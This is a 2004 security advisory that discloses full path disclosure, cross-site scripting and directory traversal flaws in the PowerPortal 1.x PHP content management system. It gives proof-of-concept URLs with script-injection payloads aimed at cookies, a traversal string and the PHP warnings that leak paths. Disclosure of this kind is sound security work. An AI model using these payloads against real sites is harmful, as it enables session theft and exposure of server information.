PowerPortal version 1.x suffers from full path disclosure, cross site scripting, and arbitrary directory browsing flaws.
c2ead58aa5b18cef122380780b1677c7bfd50ea35b5f30c403f12cce123047e2
https://www.swp-zone.org/archivos/advisory-07.txt
-------------------------------------------------------------------------------------------------
:.: Multiple vulnerabilities PowerPortal :.:
PROGRAM: PowerPortal
HOMEPAGE: https://powerportal.sourceforge.net/
VERSION: v1.x
BUG: Multiple vulnerabilities
DATE: 23/05/2004
AUTHOR: DarkBicho
web: https://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Email: darkbicho@peru.com
-------------------------------------------------------------------------------------------------
1.- Affected software description:
------------------------------
PowerPortal is a popular content management system, written in php
2.- Vulnerabilities:
---------------
A. Full path disclosure:
This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive
information.
:.: Examples:
* https://attacker/modules/gallery/resize.php
<br />
<b>Warning</b>: imagecreatetruecolor(): Invalid image dimensions in
<b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
<b>18</b><br />
<br />
<b>Warning</b>: imagecopyresized(): supplied argument is not a
valid Image resource in
<b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
<b>20</b><br />
<br />
<b>Warning</b>: imagejpeg(): supplied argument is not a valid Image
resource in
<b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
<b>23</b><br />
* https://attacker/power/modules.php?name=gallery&files=darkbicho
Warning:
opendir(c:\appserv\www\power\modules\gallery/../../modules/gallery/images/darkbicho):
failed to open dir: Invalid argument in
c:\appserv\www\power\modules\gallery\index.php on
line 99
B. Cross-Site Scripting aka XSS:
https://attacker/modules.php?name=private_messages&file=reply&id='><script>alert(document.cookie);</script>
https://attacker/modules.php?name=links&search=<script>alert(document.cookie);</script>&func=search_results
https://attacker/modules.php?name=content&file=search&search=<script>alert(document.cookie);</script>&func=results
https://attacker/modules.php?name=gallery&files=<script>alert(document.cookie);</script>
C. Arbitrary directory browsing:
* https://attacker/modules.php?name=gallery&files=/../../../
3.- SOLUTION:
¨¨¨¨¨¨¨¨
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the PowerPortal website for updates and official release
details.
4.- Greetings:
---------
greetings to my Peruvian group swp and perunderforce :D
"EL PISCO ES Y SERA PERUANO"
5.- Contact
-------
WEB: https://www.darkbicho.tk
EMAIL: darkbicho@peru.com
-------------------------------------------------------------------------------------------------
___________ ____________
/ _____/ \ / \______ \
\_____ \\ \/\/ /| ___/
/ \\ / | |
/_______ / \__/\ / |____|
\/ \/
Security Wari Projects
(c) 2002 - 2004
Made in Peru
----------------------------------------[ EOF
]----------------------------------------------
DarkBicho
Web: https://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"
---------------------- The End ----------------------